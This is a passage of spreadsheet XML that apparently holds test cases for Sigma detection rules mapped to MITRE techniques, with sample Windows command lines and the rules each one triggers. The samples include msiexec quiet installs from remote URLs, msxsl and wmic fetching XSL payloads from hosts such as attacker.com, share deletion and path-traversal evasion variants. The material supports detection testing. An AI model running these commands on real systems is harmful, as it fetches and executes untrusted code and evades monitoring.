      <c r="K4045" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4046" ht="15.75" customHeight="1" s="42">
      <c r="A4046" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B4046" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_dll</t>
        </is>
      </c>
      <c r="C4046" s="44" t="inlineStr">
        <is>
          <t>DllUnregisterServer Function Call Via Msiexec.EXE</t>
        </is>
      </c>
      <c r="D4046" s="44" t="inlineStr">
        <is>
          <t>84f52741-8834-4a8c-a413-2eb2269aa6c8</t>
        </is>
      </c>
      <c r="E4046" s="44" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe    /z    "C:\AtomicRedTeam\atomics\T1218.007\bin\MSIRunner.dll"</t>
        </is>
      </c>
      <c r="F4046" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4046" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4046" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4046" s="44" t="inlineStr">
        <is>
          <t>DllUnregisterServer Function Call Via Msiexec.EXE (84f52741-8834-4a8c-a413-2eb2269aa6c8)</t>
        </is>
      </c>
      <c r="J4046" s="44" t="n"/>
      <c r="K4046" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4047" ht="15.75" customHeight="1" s="42">
      <c r="A4047" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B4047" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_execute_dll</t>
        </is>
      </c>
      <c r="C4047" s="44" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Execute Arbitrary DLL</t>
        </is>
      </c>
      <c r="D4047" s="44" t="inlineStr">
        <is>
          <t>6f4191bb-912b-48a8-9ce7-682769541e6d</t>
        </is>
      </c>
      <c r="E4047" s="44" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe /y:"C:\AtomicRedTeam\atomics\T1218.007\bin\MSIRunner.dll"</t>
        </is>
      </c>
      <c r="F4047" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4047" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4047" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4047" s="44" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Execute Arbitrary DLL (6f4191bb-912b-48a8-9ce7-682769541e6d)</t>
        </is>
      </c>
      <c r="J4047" s="44" t="n"/>
      <c r="K4047" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4048" ht="15.75" customHeight="1" s="42">
      <c r="A4048" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B4048" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_execute_dll</t>
        </is>
      </c>
      <c r="C4048" s="44" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Execute Arbitrary DLL</t>
        </is>
      </c>
      <c r="D4048" s="44" t="inlineStr">
        <is>
          <t>6f4191bb-912b-48a8-9ce7-682769541e6d</t>
        </is>
      </c>
      <c r="E4048" s="44" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe    /y    "C:\AtomicRedTeam\atomics\T1218.007\bin\MSIRunner.dll"</t>
        </is>
      </c>
      <c r="F4048" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4048" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4048" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4048" s="44" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Execute Arbitrary DLL (6f4191bb-912b-48a8-9ce7-682769541e6d)</t>
        </is>
      </c>
      <c r="J4048" s="44" t="n"/>
      <c r="K4048" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4049" ht="15.75" customHeight="1" s="42">
      <c r="A4049" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B4049" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_execute_dll</t>
        </is>
      </c>
      <c r="C4049" s="44" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Execute Arbitrary DLL</t>
        </is>
      </c>
      <c r="D4049" s="44" t="inlineStr">
        <is>
          <t>6f4191bb-912b-48a8-9ce7-682769541e6d</t>
        </is>
      </c>
      <c r="E4049" s="44" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe /y "C:\Windows\CCM\..\..\AtomicRedTeam\atomics\T1218.007\bin\MSIRunner.dll"</t>
        </is>
      </c>
      <c r="F4049" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4049" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4049" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4049" s="44" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Execute Arbitrary DLL (6f4191bb-912b-48a8-9ce7-682769541e6d); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b)</t>
        </is>
      </c>
      <c r="J4049" s="44" t="n"/>
      <c r="K4049" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4050" ht="15.75" customHeight="1" s="42">
      <c r="A4050" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B4050" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_install_quiet</t>
        </is>
      </c>
      <c r="C4050" s="44" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation</t>
        </is>
      </c>
      <c r="D4050" s="44" t="inlineStr">
        <is>
          <t>79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5</t>
        </is>
      </c>
      <c r="E4050" s="44" t="inlineStr">
        <is>
          <t>msiexec.exe /quiet /package "C:\AtomicRedTeam\atomics\T1218.007\bin\T1218.007_DLL.msi"</t>
        </is>
      </c>
      <c r="F4050" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4050" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4050" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4050" s="44" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5)</t>
        </is>
      </c>
      <c r="J4050" s="44" t="n"/>
      <c r="K4050" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4051" ht="15.75" customHeight="1" s="42">
      <c r="A4051" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B4051" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_install_quiet</t>
        </is>
      </c>
      <c r="C4051" s="44" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation</t>
        </is>
      </c>
      <c r="D4051" s="44" t="inlineStr">
        <is>
          <t>79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5</t>
        </is>
      </c>
      <c r="E4051" s="44" t="inlineStr">
        <is>
          <t>msiexec.exe "/i" "/quiet" "C:\AtomicRedTeam\atomics\T1218.007\bin\T1218.007_DLL.msi"</t>
        </is>
      </c>
      <c r="F4051" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4051" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4051" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4051" s="44" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5)</t>
        </is>
      </c>
      <c r="J4051" s="44" t="n"/>
      <c r="K4051" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4052" ht="15.75" customHeight="1" s="42">
      <c r="A4052" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B4052" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_install_quiet</t>
        </is>
      </c>
      <c r="C4052" s="44" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation</t>
        </is>
      </c>
      <c r="D4052" s="44" t="inlineStr">
        <is>
          <t>79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5</t>
        </is>
      </c>
      <c r="E4052" s="44" t="inlineStr">
        <is>
          <t>msiexec.exe /i:"C:\AtomicRedTeam\atomics\T1218.007\bin\T1218.007_DLL.msi" /quiet</t>
        </is>
      </c>
      <c r="F4052" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4052" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4052" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4052" s="44" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5)</t>
        </is>
      </c>
      <c r="J4052" s="44" t="n"/>
      <c r="K4052" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4053" ht="15.75" customHeight="1" s="42">
      <c r="A4053" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B4053" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_install_quiet</t>
        </is>
      </c>
      <c r="C4053" s="44" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation</t>
        </is>
      </c>
      <c r="D4053" s="44" t="inlineStr">
        <is>
          <t>79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5</t>
        </is>
      </c>
      <c r="E4053" s="44" t="inlineStr">
        <is>
          <t>msiexec.exe /qn /i "C:\AtomicRedTeam\atomics\T1218.007\bin\T1218.007_DLL.msi"</t>
        </is>
      </c>
      <c r="F4053" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4053" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4053" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4053" s="44" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5)</t>
        </is>
      </c>
      <c r="J4053" s="44" t="n"/>
      <c r="K4053" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4054" ht="15.75" customHeight="1" s="42">
      <c r="A4054" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B4054" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_install_remote</t>
        </is>
      </c>
      <c r="C4054" s="44" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Quiet Install From Remote Location</t>
        </is>
      </c>
      <c r="D4054" s="44" t="inlineStr">
        <is>
          <t>8150732a-0c9d-4a99-82b9-9efb9b90c40c</t>
        </is>
      </c>
      <c r="E4054" s="44" t="inlineStr">
        <is>
          <t>msiexec.exe /q /i "HtTpS://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi"</t>
        </is>
      </c>
      <c r="F4054" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4054" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4054" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4054" s="44" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5); Suspicious Msiexec Quiet Install From Remote Location (8150732a-0c9d-4a99-82b9-9efb9b90c40c)</t>
        </is>
      </c>
      <c r="J4054" s="44" t="n"/>
      <c r="K4054" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4055" ht="15.75" customHeight="1" s="42">
      <c r="A4055" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B4055" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_install_remote</t>
        </is>
      </c>
      <c r="C4055" s="44" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Quiet Install From Remote Location</t>
        </is>
      </c>
      <c r="D4055" s="44" t="inlineStr">
        <is>
          <t>8150732a-0c9d-4a99-82b9-9efb9b90c40c</t>
        </is>
      </c>
      <c r="E4055" s="44" t="inlineStr">
        <is>
          <t>msiexec.exe "/q" "/i" "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi"</t>
        </is>
      </c>
      <c r="F4055" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4055" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4055" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4055" s="44" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5); Suspicious Msiexec Quiet Install From Remote Location (8150732a-0c9d-4a99-82b9-9efb9b90c40c)</t>
        </is>
      </c>
      <c r="J4055" s="44" t="n"/>
      <c r="K4055" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4056" ht="15.75" customHeight="1" s="42">
      <c r="A4056" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B4056" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_install_remote</t>
        </is>
      </c>
      <c r="C4056" s="44" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Quiet Install From Remote Location</t>
        </is>
      </c>
      <c r="D4056" s="44" t="inlineStr">
        <is>
          <t>8150732a-0c9d-4a99-82b9-9efb9b90c40c</t>
        </is>
      </c>
      <c r="E4056" s="44" t="inlineStr">
        <is>
          <t>msiexec.exe /package:"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi" /q</t>
        </is>
      </c>
      <c r="F4056" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4056" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4056" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4056" s="44" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5); Suspicious Msiexec Quiet Install From Remote Location (8150732a-0c9d-4a99-82b9-9efb9b90c40c)</t>
        </is>
      </c>
      <c r="J4056" s="44" t="n"/>
      <c r="K4056" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4057" ht="15.75" customHeight="1" s="42">
      <c r="A4057" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B4057" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_install_remote</t>
        </is>
      </c>
      <c r="C4057" s="44" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Quiet Install From Remote Location</t>
        </is>
      </c>
      <c r="D4057" s="44" t="inlineStr">
        <is>
          <t>8150732a-0c9d-4a99-82b9-9efb9b90c40c</t>
        </is>
      </c>
      <c r="E4057" s="44" t="inlineStr">
        <is>
          <t>msiexec.exe /qn /i "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi"</t>
        </is>
      </c>
      <c r="F4057" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4057" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4057" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4057" s="44" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5); Suspicious Msiexec Quiet Install From Remote Location (8150732a-0c9d-4a99-82b9-9efb9b90c40c)</t>
        </is>
      </c>
      <c r="J4057" s="44" t="n"/>
      <c r="K4057" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4058" ht="15.75" customHeight="1" s="42">
      <c r="A4058" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B4058" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_install_remote</t>
        </is>
      </c>
      <c r="C4058" s="44" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Quiet Install From Remote Location</t>
        </is>
      </c>
      <c r="D4058" s="44" t="inlineStr">
        <is>
          <t>8150732a-0c9d-4a99-82b9-9efb9b90c40c</t>
        </is>
      </c>
      <c r="E4058" s="44" t="inlineStr">
        <is>
          <t>msiexec.exe /q /i "https:\\github.com\redcanaryco\atomic-red-team\raw\master\atomics\T1218.007\bin\T1218.007_JScript.msi"</t>
        </is>
      </c>
      <c r="F4058" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4058" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4058" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4058" s="44" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5); Suspicious Msiexec Quiet Install From Remote Location (8150732a-0c9d-4a99-82b9-9efb9b90c40c)</t>
        </is>
      </c>
      <c r="J4058" s="44" t="n"/>
      <c r="K4058" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4059" ht="15.75" customHeight="1" s="42">
      <c r="A4059" s="44" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B4059" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msxsl_remote_execution</t>
        </is>
      </c>
      <c r="C4059" s="44" t="inlineStr">
        <is>
          <t>Remote XSL Execution Via Msxsl.EXE</t>
        </is>
      </c>
      <c r="D4059" s="44" t="inlineStr">
        <is>
          <t>75d0a94e-6252-448d-a7be-d953dff527bb</t>
        </is>
      </c>
      <c r="E4059" s="44" t="inlineStr">
        <is>
          <t>msxsl.exe https:\\attacker.com\payload.xml C:\Windows\Diagnostics\system\UPS\util.xsl</t>
        </is>
      </c>
      <c r="F4059" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4059" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4059" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4059" s="44" t="n"/>
      <c r="J4059" s="44" t="n"/>
      <c r="K4059" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4060" ht="15.75" customHeight="1" s="42">
      <c r="A4060" s="44" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B4060" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msxsl_remote_execution</t>
        </is>
      </c>
      <c r="C4060" s="44" t="inlineStr">
        <is>
          <t>Remote XSL Execution Via Msxsl.EXE</t>
        </is>
      </c>
      <c r="D4060" s="44" t="inlineStr">
        <is>
          <t>75d0a94e-6252-448d-a7be-d953dff527bb</t>
        </is>
      </c>
      <c r="E4060" s="44" t="inlineStr">
        <is>
          <t>msxsl.exe "http://attacker.com/payload.xml" C:\Windows\Diagnostics\system\UPS\util.xsl</t>
        </is>
      </c>
      <c r="F4060" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4060" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4060" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4060" s="44" t="n"/>
      <c r="J4060" s="44" t="n"/>
      <c r="K4060" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4061" ht="15.75" customHeight="1" s="42">
      <c r="A4061" s="44" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B4061" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_xsl_script_processing</t>
        </is>
      </c>
      <c r="C4061" s="44" t="inlineStr">
        <is>
          <t>XSL Script Execution Via WMIC.EXE</t>
        </is>
      </c>
      <c r="D4061" s="44" t="inlineStr">
        <is>
          <t>05c36dd6-79d6-4a9a-97da-3db20298ab2d</t>
        </is>
      </c>
      <c r="E4061" s="44" t="inlineStr">
        <is>
          <t>wmic.exe process list /format:"[https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl](https://www.google.com/search?q=https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl)"</t>
        </is>
      </c>
      <c r="F4061" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4061" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4061" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4061" s="44" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0); Potential SquiblyTwo Technique Execution (8d63dadf-b91b-4187-87b6-34a1114577ea); XSL Script Execution Via WMIC.EXE (05c36dd6-79d6-4a9a-97da-3db20298ab2d)</t>
        </is>
      </c>
      <c r="J4061" s="44" t="n"/>
      <c r="K4061" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4062" ht="15.75" customHeight="1" s="42">
      <c r="A4062" s="44" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B4062" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_xsl_script_processing</t>
        </is>
      </c>
      <c r="C4062" s="44" t="inlineStr">
        <is>
          <t>XSL Script Execution Via WMIC.EXE</t>
        </is>
      </c>
      <c r="D4062" s="44" t="inlineStr">
        <is>
          <t>05c36dd6-79d6-4a9a-97da-3db20298ab2d</t>
        </is>
      </c>
      <c r="E4062" s="44" t="inlineStr">
        <is>
          <t>wmic.exe process list "/format:[https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl](https://www.google.com/search?q=https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl)"</t>
        </is>
      </c>
      <c r="F4062" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4062" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4062" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4062" s="44" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0); Potential SquiblyTwo Technique Execution (8d63dadf-b91b-4187-87b6-34a1114577ea); XSL Script Execution Via WMIC.EXE (05c36dd6-79d6-4a9a-97da-3db20298ab2d)</t>
        </is>
      </c>
      <c r="J4062" s="44" t="n"/>
      <c r="K4062" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4063" ht="15.75" customHeight="1" s="42">
      <c r="A4063" s="44" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B4063" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_xsl_script_processing</t>
        </is>
      </c>
      <c r="C4063" s="44" t="inlineStr">
        <is>
          <t>XSL Script Execution Via WMIC.EXE</t>
        </is>
      </c>
      <c r="D4063" s="44" t="inlineStr">
        <is>
          <t>05c36dd6-79d6-4a9a-97da-3db20298ab2d</t>
        </is>
      </c>
      <c r="E4063" s="44" t="inlineStr">
        <is>
          <t>wmic.exe process list /format:""[https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl](https://www.google.com/search?q=https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl)"</t>
        </is>
      </c>
      <c r="F4063" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4063" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4063" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4063" s="44" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0); Potential SquiblyTwo Technique Execution (8d63dadf-b91b-4187-87b6-34a1114577ea); XSL Script Execution Via WMIC.EXE (05c36dd6-79d6-4a9a-97da-3db20298ab2d)</t>
        </is>
      </c>
      <c r="J4063" s="44" t="n"/>
      <c r="K4063" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4064" ht="15.75" customHeight="1" s="42">
      <c r="A4064" s="44" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B4064" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_xsl_script_processing</t>
        </is>
      </c>
      <c r="C4064" s="44" t="inlineStr">
        <is>
          <t>XSL Script Execution Via WMIC.EXE</t>
        </is>
      </c>
      <c r="D4064" s="44" t="inlineStr">
        <is>
          <t>05c36dd6-79d6-4a9a-97da-3db20298ab2d</t>
        </is>
      </c>
      <c r="E4064" s="44" t="inlineStr">
        <is>
          <t>wmic.exe process list /format:C:\Windows\Temp\..\Temp\payload.xsl</t>
        </is>
      </c>
      <c r="F4064" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4064" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4064" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4064" s="44" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0); XSL Script Execution Via WMIC.EXE (05c36dd6-79d6-4a9a-97da-3db20298ab2d)</t>
        </is>
      </c>
      <c r="J4064" s="44" t="n"/>
      <c r="K4064" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4065" ht="15.75" customHeight="1" s="42">
      <c r="A4065" s="44" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B4065" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_xsl_script_processing</t>
        </is>
      </c>
      <c r="C4065" s="44" t="inlineStr">
        <is>
          <t>XSL Script Execution Via WMIC.EXE</t>
        </is>
      </c>
      <c r="D4065" s="44" t="inlineStr">
        <is>
          <t>05c36dd6-79d6-4a9a-97da-3db20298ab2d</t>
        </is>
      </c>
      <c r="E4065" s="44" t="inlineStr">
        <is>
          <t>wmic.exe process list /format:[http://127.0.0.1/payload.xsl#Format:xml](https://www.google.com/search?q=http://127.0.0.1/payload.xsl%23Format:xml)</t>
        </is>
      </c>
      <c r="F4065" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4065" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4065" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4065" s="44" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0); Potential SquiblyTwo Technique Execution (8d63dadf-b91b-4187-87b6-34a1114577ea)</t>
        </is>
      </c>
      <c r="J4065" s="44" t="n"/>
      <c r="K4065" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4066" ht="15.75" customHeight="1" s="42">
      <c r="A4066" s="44" t="inlineStr">
        <is>
          <t>t1070.005</t>
        </is>
      </c>
      <c r="B4066" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_net_share_unmount</t>
        </is>
      </c>
      <c r="C4066" s="44" t="inlineStr">
        <is>
          <t>Unmount Share Via Net.EXE</t>
        </is>
      </c>
      <c r="D4066" s="44" t="inlineStr">
        <is>
          <t>cb7c4a03-2871-43c0-9bbb-18bbdb079896</t>
        </is>
      </c>
      <c r="E4066" s="44" t="inlineStr">
        <is>
          <t>net share C$ "/delete"</t>
        </is>
      </c>
      <c r="F4066" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4066" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4066" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4066" s="44" t="inlineStr">
        <is>
          <t>Unmount Share Via Net.EXE (cb7c4a03-2871-43c0-9bbb-18bbdb079896); Unmount Share Via Net.EXE (cb7c4a03-2871-43c0-9bbb-18bbdb079896)</t>
        </is>
      </c>
      <c r="J4066" s="44" t="n"/>
      <c r="K4066" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4067" ht="15.75" customHeight="1" s="42">
      <c r="A4067" s="44" t="inlineStr">
        <is>
          <t>t1070.005</t>
        </is>
      </c>
      <c r="B4067" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_net_share_unmount</t>
        </is>
      </c>
      <c r="C4067" s="44" t="inlineStr">
        <is>
          <t>Unmount Share Via Net.EXE</t>
        </is>
      </c>
      <c r="D4067" s="44" t="inlineStr">
        <is>
          <t>cb7c4a03-2871-43c0-9bbb-18bbdb079896</t>
        </is>
      </c>
      <c r="E4067" s="44" t="inlineStr">
        <is>
          <t>net.exe /delete share C$</t>
        </is>
      </c>
      <c r="F4067" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4067" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4067" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4067" s="44" t="inlineStr">
        <is>
          <t>Unmount Share Via Net.EXE (cb7c4a03-2871-43c0-9bbb-18bbdb079896); Unmount Share Via Net.EXE (cb7c4a03-2871-43c0-9bbb-18bbdb079896)</t>
        </is>
      </c>
      <c r="J4067" s="44" t="n"/>
      <c r="K4067" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4068" ht="15.75" customHeight="1" s="42">
      <c r="A4068" s="44" t="inlineStr">
        <is>
          <t>t1070.005</t>
        </is>
      </c>
      <c r="B4068" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_net_share_unmount</t>
        </is>
      </c>
      <c r="C4068" s="44" t="inlineStr">
        <is>
          <t>Unmount Share Via Net.EXE</t>
        </is>
      </c>
      <c r="D4068" s="44" t="inlineStr">
        <is>
          <t>cb7c4a03-2871-43c0-9bbb-18bbdb079896</t>
        </is>
      </c>
      <c r="E4068" s="44" t="inlineStr">
        <is>
          <t>net	share	C$	/delete</t>
        </is>
      </c>
      <c r="F4068" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4068" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4068" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4068" s="44" t="inlineStr">
        <is>
